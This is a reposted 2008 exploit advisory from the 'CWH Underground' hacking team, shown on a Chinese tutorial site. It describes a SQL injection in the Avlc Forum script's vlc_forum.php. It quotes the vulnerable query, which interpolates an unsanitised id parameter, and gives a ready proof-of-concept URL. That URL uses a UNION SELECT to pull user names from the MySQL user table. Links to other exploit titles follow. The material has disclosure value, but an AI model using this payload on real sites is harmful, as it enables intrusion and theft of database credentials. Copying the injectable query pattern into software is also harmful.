手机
当前位置:查字典教程网 >网络安全 >Exploit >Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
摘要:====================================================================Av...

====================================================================

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

====================================================================

,--^----------,--------,-----,-------^--,

| ||||||||| `--------' | O .. CWH Underground Hacking Team ..

` ---------------------------^----------|

`_,-------, _________________________|

/ XXXXXX /`| /

/ XXXXXX / ` /

/ XXXXXX /______(

/ XXXXXX /

/ XXXXXX /

(________(

`------'

AUTHOR : CWH Underground

DATE : 12 July 2008

SITE : cwh.citec.us

#####################################################

APPLICATION : Avlc Forum

VERSION : N/A

VENDOR : N/A

DOWNLOAD : http://www.easy-script.com/compt.php?id=2147

#####################################################

-- Remote SQL Injection ---

---------------------------------

Vulnerable File [vlc_forum.php]

---------------------------------

@Line

141: $sql = "SELECT * FROM vlc_forum WHERE id=$id OR re=$id";

142: $req = mysql_query($sql) or die('Erreur SQL !'.$sql.'<br>' . mysql_error());

-------------

POC Exploit

-------------

[ ] http://[Target]/[avlc_path]/vlc_forum.php?action=affich_message&id=-999999/**/UNION/**/SELECT/**/1,user,3,4,5,6,7,8,9/**/FROM/**/mysql.user--

#####################################################################

Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos

Special Thx : asylu3, str0ke, citec.us, milw0rm.com

#####################################################################

【Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability】相关文章:

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)

webEdition CMS (we_objectID) Blind SQL Injection Exploit

BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability

phsBlog 0.2 Bypass SQL Injection Filtering Exploit

LoveCMS 1.6.2 Final Remote Code Execution Exploit

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)

Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities

Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

Maian Gallery 2.0 Insecure Cookie Handling Vulnerability

精品推荐
分类导航